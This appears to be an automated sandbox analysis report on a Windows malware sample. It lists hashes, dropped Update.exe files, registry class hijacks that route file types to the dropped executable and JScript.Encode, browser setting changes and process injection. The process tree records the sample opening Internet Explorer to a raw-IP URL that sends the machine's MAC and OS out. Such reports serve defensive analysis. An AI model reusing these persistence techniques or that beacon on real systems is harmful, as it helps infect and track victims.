Analysis
-
max time kernel
98s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
03/10/2022, 06:47
Behavioral task
behavioral1
Sample
b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe
Resource
win10v2004-20220901-en
General
-
Target
b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe
-
Size
143KB
-
MD5
3d8b4d1af46118ecfcb457ae655addac
-
SHA1
3c5535f81659431c3c5126ffb25442c9cf98d2ae
-
SHA256
b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840
-
SHA512
79017dc50299fdda2acdc4f51984b750f51bebbde1d870aaa778ea9c873a3d3f89df6a1c03f316e933b7832b09df1bb52a0c84a18b7ef223e17aed91c4e7505c
-
SSDEEP
3072:kWNSP8uUdzh5vaBAzmeu2ZNhe9HOhIAsdxn6sM0TZMl9V:bNS0uUdzh5vaBAz5PDhIAsdxn6sM0TZ6
Malware Config
Signatures
-
resource yara_rule behavioral1/memory/1256-55-0x0000000000400000-0x0000000000426000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files\Thunder\Update.exe b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe File created C:\Program Files\Thunder\Update.exe b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\WINDOWS\Downloaded Program Files\Update.exe b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Frist b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000ad4f101d7ae7d1e05b2e270827728e61f115f8da7a12728658a3aa0e19b708ce000000000e800000000200002000000077935c208fba2240936198b2a7672b96272fa83cb42a647bff7844b16dda2695200000006bec7d0a22d4b024058f840be9001c8c16e010767dc920eb548e893ca26324ae40000000c5a33c666e14230e1e2c496685d967688a2687f64fa0566211b59aa2f153793d41884509566a779ec296215a482fd6944f1c3d33a8e031fed6c43af22e47d63b iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "371668767" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000d1a18d49494950832939f46213b56e7967c6330b8737bc76c380b0e577c46401000000000e80000000020000200000006cd7ce1c6cf69dafabce7f32d0fe5d2338f5331c9ebdf698e3b704f40820ac259000000072b193d379bd639100923871d590d42888f4024121616e3364690cb6d5152e5b6cbda5cb4f7f4eb1a7916cfe77a36265e30ac0942dc2bd01f051f8c54fa2da7a497fc12d1c39b744a53b4a298846209b2474889fb481cbfbad62fe2e31516c119705629b12afd906215f0528d8d886424e3751277b7e6dc3edab894e4f24a2b7036a42db542641b52b321c301d5c24bf40000000bc01fa4a0bb8ce9b4101534ef2c6a9d9f311d5b924a46c3c31c46cbe1d9b21a972f25344835f4e84b35974e891c638271294fe08418ac535c069b39073a923f7 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4ACAB091-4408-11ED-979A-4A7553B9BC92} = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80d0334015d8d801 iexplore.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\Update.exe \"%1\" %*" b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode" b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode" b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\fonfile b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico" b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Favorites\VANCL ·²¿Í³ÏÆ·: »¥ÁªÍø¿ìʱÉÐÆ·ÅÆ.html b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1284 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1284 iexplore.exe 1284 iexplore.exe 1940 IEXPLORE.EXE 1940 IEXPLORE.EXE 1940 IEXPLORE.EXE 1940 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1256 wrote to memory of 1284 1256 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe 27 PID 1256 wrote to memory of 1284 1256 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe 27 PID 1256 wrote to memory of 1284 1256 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe 27 PID 1256 wrote to memory of 1284 1256 b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe 27 PID 1284 wrote to memory of 1940 1284 iexplore.exe 29 PID 1284 wrote to memory of 1940 1284 iexplore.exe 29 PID 1284 wrote to memory of 1940 1284 iexplore.exe 29 PID 1284 wrote to memory of 1940 1284 iexplore.exe 29
Processes
-
C:\Users\Admin\AppData\Local\Temp\b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe"C:\Users\Admin\AppData\Local\Temp\b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a341840.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1256 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=4a-75-53-b9-bc-92&os=Microsoft Windows XP&flag=b0f9ef78d192bf79d3e69022dd9f1744&user=b0510219bf20abf52e26de43d9db02183450e796624691e773edca7e8a3418402⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1284 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1940
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
603B
MD5028209a7e1847d569ede63ce1cdae4dc
SHA108f4be432f1b74999693bb623852f49c2ecaafab
SHA256dfbdebebcd08f6d97e5d238f04280a6024120b8b438ac48c0a439088619dbb1e
SHA51295148e11f9a956ddbf8ae721f6c59ac84aae94a10e3592e5e8b107bf1b81cfb0316c25dfff0b04725daa6b6dd8b3240d38445e64fa536e6cf5db7239e9a044f4